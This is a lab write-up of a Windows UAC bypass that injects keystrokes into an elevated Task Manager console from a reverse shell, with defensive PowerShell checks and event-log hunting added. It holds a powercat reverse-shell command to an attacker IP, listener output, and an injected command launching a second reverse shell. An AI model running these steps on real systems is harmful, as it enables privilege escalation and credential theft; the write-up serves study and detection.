init#

The primary objective of this writeup is to check whether an attacker can use this technique to bypass UAC and gain additional privileges using ONLY a Command Prompt / PowerShell window obtained from a reverse shell.

User Account Control (UAC) in Windows is a "feature" (Microsoft itself does not treat it as a security boundary, only as defense in depth) that is meant to prevent a user from making unwanted changes to the system. When an application needs to run with elevated permissions, Windows asks the user to confirm that the action is actually legitimate. This gives the user the option to deny any process that is trying to perform actions as "Administrator".

As per Microsoft:

User Account Control (UAC) is a Windows security feature designed to protect the operating system from unauthorized changes. When changes to the system require administrator-level permission, UAC notifies the user, giving the opportunity to approve or deny the change. UAC improves the security of Windows devices by limiting the access that malicious code has to execute with administrator privileges. UAC empowers users to make informed decisions about actions that may affect the stability and security of their device.

Even if you log in to Windows as a member of the Administrators group, your processes do not get the permissions needed to make system changes: they run with a filtered, medium-integrity token. Only after you confirm the UAC prompt is a process started with the full administrator token. We can see the difference in the screenshot below:

bc85e1d6694f5812d46a7b3d70338968.png The only difference between the two PowerShell windows is UAC elevation, and the permission difference between them is easy to see.
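As an added example (not from the original post), the following PowerShell function shows the same difference from inside a shell, which is all an attacker gets from a reverse shell: it reports the token's integrity level, whether the process is elevated, and whether the account is an administrator whose Administrators membership has been filtered out by UAC (the "Group used for deny only" flag). The function and property names are my own.

```powershell
# Added example, not from the original post: tell a filtered (medium-IL)
# administrator token apart from an elevated one without any UI.
function Get-TokenElevationInfo {
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal]$identity
    $adminRole = [Security.Principal.WindowsBuiltInRole]::Administrator

    # IsInRole() is $false for a filtered token even though the account is a
    # member of Administrators, because UAC marks that group SID "deny only".
    $isElevated = $principal.IsInRole($adminRole)

    # whoami /groups lists the integrity label and the deny-only flag; parse
    # its CSV output instead of scraping the fixed-width table.
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $label  = ($groups | Where-Object { $_.Type -eq 'Label' }).'Group Name'

    # S-1-5-32-544 is BUILTIN\Administrators; absent entirely for a standard user.
    $adminGroup = $groups | Where-Object { $_.SID -eq 'S-1-5-32-544' }
    $denyOnly   = [bool]($adminGroup -and ($adminGroup.Attributes -match 'deny only'))

    [pscustomobject]@{
        User               = $identity.Name
        IntegrityLevel     = $label
        IsElevated         = $isElevated
        AdminDenyOnly      = $denyOnly
        FilteredAdminToken = ($denyOnly -and -not $isElevated)
    }
}

Get-TokenElevationInfo | Format-List
```

Run it in both windows from the screenshot: the non-elevated one reports `Mandatory Label\Medium Mandatory Level` with `FilteredAdminToken = True`, the elevated one reports `High Mandatory Level` with `IsElevated = True`. A `FilteredAdminToken = True` result from a reverse shell is exactly the situation this post is about.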

Now, if an attacker is able to access your system, there is almost no way to go from a normal user to Administrator unless they have RDP access, because the UAC prompt is shown on the interactive (secure) desktop and cannot be answered from a command prompt alone. There are a few techniques that allow an attacker to bypass UAC and gain the permissions needed to modify the system. In this post I would like to share a technique I have just learned.

overview#

Interestingly, there is a "feature" in Task Manager: if you click "Run new task" while holding Ctrl, a Command Prompt opens with Administrator privileges WITHOUT any UAC prompt. This works because Task Manager itself already runs elevated when the interactive user is an administrator, so the console it spawns simply inherits that elevated token. You can see this on both Windows 10 (1703) and Windows 11 (22H2):

45dbd425e96de38a7c53d34c0c925fe2.png Windows 10

bddb197323f4c2323a678120b2990e39.png And the same thing on Windows 11
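Added example, not part of the original post or of the Reference 1 code: a quick pre-flight check from the low-privilege shell for the two things the exploit output later reports, a running Task Manager and an elevated console window. It relies on the "Administrator: " prefix that an elevated cmd.exe puts in its console title; this is a heuristic and assumes the classic console host (under Windows Terminal, cmd.exe owns no top-level window and `MainWindowTitle` is empty). The function name is mine.

```powershell
# Added example, not from the original post: check from a non-elevated shell
# whether the windows this technique depends on exist in the current session.
function Test-ElevatedConsoleTargets {
    # Task Manager self-elevates when the interactive user is an administrator;
    # for a standard user it runs at medium IL and there is nothing to inject into.
    $taskmgr = Get-Process -Name Taskmgr -ErrorAction SilentlyContinue

    # Heuristic (assumption: classic console host): an elevated cmd.exe titles
    # its console "Administrator: C:\Windows\system32\cmd.exe". Reading window
    # titles of a higher-IL process is allowed; UIPI only blocks sending input.
    $elevatedCmd = Get-Process -Name cmd -ErrorAction SilentlyContinue |
        Where-Object { $_.MainWindowTitle -like 'Administrator:*' }

    [pscustomobject]@{
        TaskManagerRunning = [bool]$taskmgr
        ElevatedCmdWindows = @($elevatedCmd | ForEach-Object {
            '{0} ({1})' -f $_.Id, $_.MainWindowTitle })
        CandidateFound     = ([bool]$taskmgr -and [bool]$elevatedCmd)
    }
}

Test-ElevatedConsoleTargets | Format-List
```

If `CandidateFound` is `False`, the exploit has no high-IL console to type into and will not get past its "window found" stage; the check is cheap and avoids launching a noisy binary for nothing.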

I really wanted to share the source from which I obtained this information but unfortunately I forgot it. You can find additional information in Reference 1 if you want.

prerequisite#

As bypassing Microsoft Defender is not the primary concern, I will disable it by running the command before starting anything, since most of the commands / scripts used here are considered malicious in nature and would be blocked. Note that turning off real-time protection itself requires an elevated context (and Tamper Protection, if enabled, blocks it), so this is a lab setup step done on the victim beforehand, not something the low-privilege reverse shell can do.

process#

We will be using two separate reverse shells: a regular one with no additional permissions, and a second one started by the code that actually runs the "exploit".

Let's download the powercat script and run the following:

powercat -c 192.168.0.17 -p 8888 -e cmd.exe

Here, 192.168.0.17 is my attacking VM. Once powercat runs, we should get the reverse shell:

$ nc -nvlp 8888
listening on [any] 8888 ...
connect to [192.168.0.17] from (UNKNOWN) [192.168.0.16] 49900
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Users\user1>

C:\Users\user1>whoami
whoami
desktop-t26ftc0\user1

C:\Users\user1>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State   
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled 
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

As we can see, the privileges we have are the normal ones for a medium-integrity token and do not allow us to perform any administrative functions.

From Reference 1, let's download the code and build it with Visual Studio (ConsoleApplication1.exe). The original code runs Notepad and types some text into its window. I changed it to run a reverse-shell executable (re.exe) that I obtained and compiled from Reference 2; this second reverse shell uses port 4444.

Once built, the "exploit" locates the Task Manager window and a high-integrity cmd.exe window and types a command into the latter; since UIPI normally blocks a medium-integrity process from sending input to a high-integrity window, the process re-launches itself with the UIAccess flag to do so. The command it types starts re.exe, which sends another reverse shell to port 4444. So open a second listener in another window and then execute the "exploit" from the first reverse shell:

C:\Users\user1>cd "C:\Users\user1\source\repos\ConsoleApplication1\x64\Release"
cd "C:\Users\user1\source\repos\ConsoleApplication1\x64\Release"

C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 1AF6-1DD9

 Directory of C:\Users\user1\source\repos\ConsoleApplication1\x64\Release

09/02/2023  12:40 PM    <DIR>          .
09/02/2023  12:40 PM    <DIR>          ..
09/02/2023  12:40 PM            15,872 ConsoleApplication1.exe
09/02/2023  12:40 PM           634,880 ConsoleApplication1.pdb
               2 File(s)        650,752 bytes
               2 Dir(s)   4,807,606,272 bytes free

C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>ConsoleApplication1.exe
ConsoleApplication1.exe
Task Manager window found
High IL cmd.exe window found
The string 'cmd /c C:\users\user1\Desktop\re.exe' has been sent to the High IL cmd.exe!
Current process respawned with UIAccess flag

C:\Users\user1\source\repos\ConsoleApplication1\x64\Release>

We should get another reverse shell, as shown below: 9bbf3592972303fd5d901a57d5580e5c.png

As we can see, we have elevated our privileges and now have the additional permissions needed to perform system operations, without the user ever seeing a UAC prompt. Keep in mind what this needs: the reverse shell must run in the interactive session of a user who is a member of Administrators and has Task Manager open; for a standard user, Task Manager is not elevated and there is no high-integrity console to inject into. From here we can perform further operations, such as running mimikatz to harvest credentials, and if the workstation is joined to an Active Directory domain, the consequences could be severe.
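Added example, not from the original post: the defender's side of the same chain. Security event 4688 records the parent image and the token elevation type of every new process, so the two stages visible in the exploit output (an elevated cmd.exe parented by Taskmgr.exe, then an elevated child of cmd.exe living under C:\Users) can be hunted for. It assumes "Audit Process Creation" and "Include command line in process creation events" are enabled; the sample records are constructed to mirror this post's run, not taken from a real log, and the function names are mine.

```powershell
# Added example, not from the original post: hunt Security event 4688 records
# for the Task Manager -> elevated cmd.exe -> user-path child chain.

# TokenElevationType values exactly as they appear in the 4688 XML payload:
# %%1936 = Default (UAC off / built-in admin), %%1937 = Full, %%1938 = Limited.
$ElevatedTokenTypes = @('%%1936', '%%1937')

function ConvertFrom-ProcessCreationEvent {
    # Flatten one live 4688 EventRecord into the same shape as the samples below.
    param([Parameter(Mandatory)][System.Diagnostics.Eventing.Reader.EventRecord]$Event)
    $data = @{}
    foreach ($d in ([xml]$Event.ToXml()).Event.EventData.Data) { $data[$d.Name] = $d.'#text' }
    [pscustomobject]@{
        TimeCreated        = $Event.TimeCreated
        SubjectUserName    = $data.SubjectUserName
        NewProcessName     = $data.NewProcessName
        ParentProcessName  = $data.ParentProcessName
        TokenElevationType = $data.TokenElevationType
        CommandLine        = $data.CommandLine
    }
}

function Find-TaskmgrElevationChain {
    param([Parameter(Mandatory)][object[]]$Events)
    foreach ($e in $Events) {
        # Only elevated tokens matter; a Limited (%%1938) token is plain UAC-filtered use.
        if ($e.TokenElevationType -notin $ElevatedTokenTypes) { continue }
        $image  = Split-Path -Leaf $e.NewProcessName
        $parent = Split-Path -Leaf $e.ParentProcessName
        $stage  = $null
        # Stage 1: the Ctrl + "Run new task" console itself. Legitimate admins do
        # this too, so on its own it is a hunting lead rather than an alert.
        if ($image -ieq 'cmd.exe' -and $parent -ieq 'Taskmgr.exe') {
            $stage = 'elevated cmd.exe spawned by Task Manager'
        }
        # Stage 2: what the injected keystrokes ran, an elevated child of cmd.exe
        # whose image sits in a user-writable location.
        elseif ($parent -ieq 'cmd.exe' -and $e.NewProcessName -like 'C:\Users\*') {
            $stage = 'elevated user-path child of cmd.exe'
        }
        if ($stage) {
            [pscustomobject]@{
                Stage = $stage; Time = $e.TimeCreated; User = $e.SubjectUserName
                Process = $e.NewProcessName; CommandLine = $e.CommandLine
            }
        }
    }
}

# Constructed sample records modelled on this post's run (not real log data).
$SampleEvents = @(
    [pscustomobject]@{ TimeCreated = '2023-09-02 12:41:03'; SubjectUserName = 'user1'
        NewProcessName = 'C:\Windows\System32\cmd.exe'; ParentProcessName = 'C:\Windows\System32\Taskmgr.exe'
        TokenElevationType = '%%1937'; CommandLine = '"C:\Windows\System32\cmd.exe"' }
    [pscustomobject]@{ TimeCreated = '2023-09-02 12:41:40'; SubjectUserName = 'user1'
        NewProcessName = 'C:\Windows\System32\cmd.exe'; ParentProcessName = 'C:\Windows\System32\cmd.exe'
        TokenElevationType = '%%1937'; CommandLine = 'cmd /c C:\users\user1\Desktop\re.exe' }
    [pscustomobject]@{ TimeCreated = '2023-09-02 12:41:40'; SubjectUserName = 'user1'
        NewProcessName = 'C:\Users\user1\Desktop\re.exe'; ParentProcessName = 'C:\Windows\System32\cmd.exe'
        TokenElevationType = '%%1937'; CommandLine = 'C:\users\user1\Desktop\re.exe' }
    [pscustomobject]@{ TimeCreated = '2023-09-02 12:42:10'; SubjectUserName = 'user1'
        NewProcessName = 'C:\Windows\System32\notepad.exe'; ParentProcessName = 'C:\Windows\explorer.exe'
        TokenElevationType = '%%1938'; CommandLine = 'notepad.exe' }   # benign, filtered token
)

Find-TaskmgrElevationChain -Events $SampleEvents | Format-Table -AutoSize
```

Against the samples this reports the first and third records and ignores the filtered-token notepad.exe. For live data (reading the Security log needs an elevated console) feed it `Get-WinEvent -FilterHashtable @{LogName='Security'; Id=4688} | ForEach-Object { ConvertFrom-ProcessCreationEvent $_ }`; a Stage 2 hit shortly after a Stage 1 hit for the same user is the pattern worth alerting on.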

I have also tested this on Windows 11 as well and it works.

disclaimer#

The information provided on this website is for educational and informational purposes only. The website owner and contributors do not condone or encourage any illegal activities, including hacking, cyberattacks, or unauthorized access to computer systems or networks.

All information and tools provided on this website are to be used at your own risk. We do not take any responsibility for how you choose to use the information or tools provided here. Users are strongly encouraged to conduct their own research and follow ethical guidelines and legal regulations when using the information and tools presented on this website.

reference#